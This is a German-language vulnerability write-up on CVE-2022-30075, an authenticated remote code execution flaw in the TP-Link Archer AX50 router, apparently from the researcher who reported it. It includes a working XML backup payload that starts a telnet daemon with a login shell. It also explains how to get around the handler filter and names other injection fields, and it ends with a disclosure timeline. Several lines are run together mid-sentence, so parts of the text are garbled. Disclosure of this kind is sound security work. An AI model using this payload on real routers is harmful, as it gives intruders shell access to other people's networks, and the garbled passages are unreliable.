
Tp-Link Archer AX50 Authentifizierte RCE (CVE-2022-30075)
Authentifizierte Remote-Codeausführung in Tp-Link-Routern
Wenn Ihr Tp-Link-Router über eine Backup- und Wiederherstellungsfunktion verfügt und die Firmware älter als Juni 2022 ist, ist er wahrscheinlich anfällig
Tp-Link Archer AX50, andere Tp-Link-Router verwenden möglicherweise ein anderes Format für Backups und der Exploit muss angepasst werden
Verwenden des Exploits zum Starten des Telnet-Daemons auf dem Router

<button name="led_switch">
<action>pressed</action>
<button>ledswitch</button>
<handler>/lib/led_switch</handler>
</button>
<button name="exploit">
<action>pressed</action>
<button>ledswitch</button>
<handler>/usr/sbin/telnetd -l /bin/login.sh</handler>
</button>
system.button.handler blockiert, aber sie kann einfach umgangen werden, indem der Name des übergeordneten XML-Knotens geändert wird (z.B. name="exploit")system.button.handler, sondern auch durch Verwendung von ddns.service.ip_script, firewall.include.path, uhttpd.main und anderen erreicht werden.../usr/sbin/telnetd -l /bin/login.sh auslösttelnet 192.168.1.115.03.2022 - Schwachstelle identifiziert
15.03.2022 - Tp-Link-Support kontaktiert
16.03.2022 - Antwort von Tp-Link erhalten
02.05.2022 - CVE zugewiesen
27.05.2022 - Tp-Link veröffentlichte Firmware mit behobener Schwachstelle
07.06.2022 - Technische Details veröffentlicht